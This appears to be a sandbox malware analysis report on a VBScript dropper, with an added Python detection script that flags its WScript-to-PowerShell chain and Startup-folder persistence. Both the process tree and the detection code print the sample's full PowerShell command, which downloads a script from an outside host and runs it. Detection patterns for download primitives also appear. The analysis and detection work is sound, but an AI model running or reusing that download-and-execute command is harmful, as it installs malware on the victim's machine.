Analysis
max time kernel: 147s
max time network: 156s
platform: windows10_x64
resource: win10v20210408
submitted: 24-08-2021 22:28
Static task: static1
Behavioral task: behavioral1
Sample: NS882992019101.vbs
Resource: win7v20210410
General
Target: NS882992019101.vbs
Size: 13KB
MD5: 1abbd5432118e4de7c696d5d43a7449f
SHA1: 49fea89d7fc9f8be3afa2fd1b0ae9b6075c0acbf
SHA256: b4489a7f0467bee2782b5e5cf74763d0c05148a9044092eb79aba7c588f35f99
SHA512: 7012990308d3b7e451c65b1bc1e26693a04e1bd63f3c3d735538fbb4e9092d87b3ed323a45231004fcbd3795c11803477d8c1645cf1d2b9c0fc915150161b31f
Malware Config
Extracted: http://7501.nerdpol.ovh/7501/fr.txt
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
  flow  pid   process
  9     3556  powershell.exe
  14    2396  powershell.exe
- Drops startup file (1 IoC)
  Processes:
  description   ioc                                                                                                        process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs   powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
  pid   process
  3556  powershell.exe
  3556  powershell.exe
  3556  powershell.exe
  2396  powershell.exe
  2396  powershell.exe
  2396  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
  description              pid   process
  Token: SeDebugPrivilege  3556  powershell.exe
  Token: SeDebugPrivilege  2396  powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
  description                       pid   process         target process
  PID 740 wrote to memory of 3556   740   WScript.exe     powershell.exe
  PID 740 wrote to memory of 3556   740   WScript.exe     powershell.exe
  PID 3556 wrote to memory of 2396  3556  powershell.exe  powershell.exe
  PID 3556 wrote to memory of 2396  3556  powershell.exe  powershell.exe
Processes
1. C:\Windows\System32\WScript.exe (PID 740)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NS882992019101.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3556, child of 740)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://7501.nerdpol.ovh/7501/fr.txt','C:\Users\Public\fr.PS1');PowerShell -File C:\Users\Public\fr.PS1
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2396, child of 3556)
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\fr.PS1
         - Blocklisted process makes network request
         - Drops startup file
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
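The process tree above is a three-stage chain: a script host (WScript.exe) spawns PowerShell with a WebClient download cradle, the cradle writes the second stage to C:\Users\Public\fr.PS1 and runs it with -File, and that second stage persists via a file in the user's Startup folder. The following is an added detection example, not part of the sandbox report and not the sample's own code: it runs Sysmon-style process-creation and file-creation records through a few rules keyed on exactly those traits, and walks parent links to reconstruct the lineage. The records are constructed by hand to mirror the report's PIDs, images, command lines and dropped file; the field names (image, ppid, cmdline, target) are an assumption modeled on Sysmon Event ID 1 and 11, not captured logs. The rules deliberately key on command lines and the Startup write rather than on the report's WriteProcessMemory signatures, because a parent writing into a child it has just created is routine at process launch and is not a useful discriminator on its own.

```python
"""Detection rules for the WScript -> PowerShell download-cradle -> Startup-folder chain.

Added example; the event records are constructed to mirror the report, not real telemetry.
"""
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 shape), mirroring the report.
PROCESS_EVENTS = [
    {"pid": 740, "ppid": 0, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NS882992019101.vbs"'},
    {"pid": 3556, "ppid": 740, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://7501.nerdpol.ovh/7501/fr.txt','C:\Users\Public\fr.PS1');PowerShell -File C:\Users\Public\fr.PS1'''},
    {"pid": 2396, "ppid": 3556, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\fr.PS1'},
]

# Constructed file-creation event (Sysmon Event ID 11 shape) for the Startup-folder drop.
FILE_EVENTS = [
    {"pid": 2396, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives; DownloadFile is the one used in this report.
CRADLE_RE = re.compile(
    r"(DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|Net\.WebClient)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"),;]+", re.IGNORECASE)
# Scripts staged under the world-writable Public profile, as fr.PS1 is here.
PUBLIC_SCRIPT_RE = re.compile(r"C:\\Users\\Public\\[^\s'\"]+\.ps1", re.IGNORECASE)
STARTUP_DIR_MARKER = "\\start menu\\programs\\startup\\"


def basename(path):
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path.strip('"')).lower()


def detect_process_events(events):
    """Flag script hosts spawning PowerShell, download cradles, and scripts run from Public."""
    findings = []
    by_pid = {e["pid"]: e for e in events}
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in SCRIPT_HOSTS and name in POWERSHELL:
            findings.append({"rule": "script_host_spawns_powershell", "pid": e["pid"],
                             "detail": f"{basename(parent['image'])} -> {name}"})
        if name in POWERSHELL:
            cmd = e["cmdline"]
            if CRADLE_RE.search(cmd):
                urls = URL_RE.findall(cmd)
                findings.append({"rule": "powershell_download_cradle", "pid": e["pid"],
                                 "detail": ", ".join(urls) or "no URL literal in command line"})
            for path in sorted(set(PUBLIC_SCRIPT_RE.findall(cmd))):
                findings.append({"rule": "powershell_script_in_public_dir",
                                 "pid": e["pid"], "detail": path})
    return findings


def detect_file_events(events):
    """Flag any file created in a per-user Startup folder."""
    findings = []
    for e in events:
        if STARTUP_DIR_MARKER in e["target"].lower():
            findings.append({"rule": "startup_folder_drop", "pid": e["pid"],
                             "detail": f"{basename(e['image'])} wrote {e['target']}"})
    return findings


def lineage(events, pid):
    """Walk ppid links from pid up to the root; returns image names root-first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def analyze(process_events, file_events):
    """Run all rules and return the combined list of findings."""
    return detect_process_events(process_events) + detect_file_events(file_events)


if __name__ == "__main__":
    for f in analyze(PROCESS_EVENTS, FILE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} {f['detail']}")
    print("lineage of 2396:", " -> ".join(lineage(PROCESS_EVENTS, 2396)))
```

On the constructed records this yields one script-host-to-PowerShell finding (PID 3556), one download-cradle finding carrying the fr.txt URL (PID 3556), a Public-directory script finding for each PowerShell instance (3556 and 2396), and one Startup-folder drop (2396), with the lineage wscript.exe -> powershell.exe -> powershell.exe. PowerShell started by explorer.exe with a script outside Public produces no findings, which is the false-positive floor these rules aim for.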
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\fr.PS1
  MD5: 5480fceef4e5290938cb0a23955358df
  SHA1: 891c237730a39b36bd443e485d3493f5f7ff68c5
  SHA256: d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020
  SHA512: 3cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392
- memory/2396-129-0x0000000000000000-mapping.dmp
- memory/2396-140-0x0000023E344D3000-0x0000023E344D5000-memory.dmp (Filesize: 8KB)
- memory/2396-139-0x0000023E344D0000-0x0000023E344D2000-memory.dmp (Filesize: 8KB)
- memory/2396-178-0x0000023E344D6000-0x0000023E344D8000-memory.dmp (Filesize: 8KB)
- memory/3556-114-0x0000000000000000-mapping.dmp
- memory/3556-119-0x000002AE72930000-0x000002AE72931000-memory.dmp (Filesize: 4KB)
- memory/3556-122-0x000002AE72AE0000-0x000002AE72AE1000-memory.dmp (Filesize: 4KB)
- memory/3556-123-0x000002AE727F0000-0x000002AE727F2000-memory.dmp (Filesize: 8KB)
- memory/3556-126-0x000002AE727F3000-0x000002AE727F5000-memory.dmp (Filesize: 8KB)
- memory/3556-138-0x000002AE727F6000-0x000002AE727F8000-memory.dmp (Filesize: 8KB)